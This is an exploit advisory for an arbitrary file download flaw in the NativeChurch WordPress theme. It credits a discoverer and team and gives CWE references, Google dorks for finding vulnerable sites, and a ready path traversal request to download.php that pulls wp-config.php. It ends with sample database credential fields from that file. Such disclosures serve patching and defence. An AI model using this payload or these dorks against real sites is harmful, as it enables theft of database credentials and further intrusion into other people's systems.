WordPress NativeChurch Multi-Purpose 5.0.x File Download

`####################################################################  
  
# Exploit Title : WordPress NativeChurch Multi-Purpose Themes 5.0.x Arbitrary File Download  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
# Date : 26/02/2019  
# Vendor Homepage : themeforest.net  
# Software Information Link :   
themeforest.net/item/nativechurch-multi-purpose-wordpress-theme/7082446  
# Software Affected Versions : WordPress From 3.9 to 5.0.x   
Compatible with Bootstrap 3.x - bbPress 2.5.x  
From WooCommerce 2.1.x To WooCommerce 3.4.x,   
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : Medium  
# Google Dorks : [PDF]Sample PDF File inurl:"/wp-content/themes/NativeChurch/"  
inurl:''inurl:/wp-content/themes/NativeChurch/download/''  
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]  
CWE-23 [ Relative Path Traversal ]  
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968  
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/  
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos  
  
####################################################################  
  
# Description about Software :  
***************************  
NativeChurch is a powerful WordPress Theme designed & developed for Church,   
  
Charity, Non-Profit and Religious Websites and comes handy   
  
for Portfolio/Corporate Websites as well.  
  
####################################################################  
  
# Impact :  
***********  
* The NativeChurch theme for WordPress is prone to a vulnerability that lets attackers   
  
download arbitrary files because the application fails to sufficiently sanitize user-supplied input.   
  
An attacker can exploit this issue to download arbitrary files within the context   
  
of the web server process. Information obtained may aid in further attacks.  
  
Attackers can use a browser to exploit this issue.   
  
* The software uses external input to construct a pathname that should be within a   
  
restricted directory, but it does not properly neutralize sequences   
  
such as ".." that can resolve to a location that is outside of that directory.  
  
####################################################################  
  
# Arbitrary File Download Exploit :  
******************************  
/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php  
  
# Example Informations about MySQL WordPress Configuration File :  
***********************************************************  
/** Nom de la base de donnees de WordPress. */  
define('DB_NAME',   
  
/** Utilisateur de la base de donnees MySQL. */  
define('DB_USER',   
  
/** Mot de passe de la base de donnees MySQL. */  
define('DB_PASSWORD',   
  
/** Adresse de l'hebergement MySQL. */  
define('DB_HOST',   
  
###################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team   
  
####################################################################  
`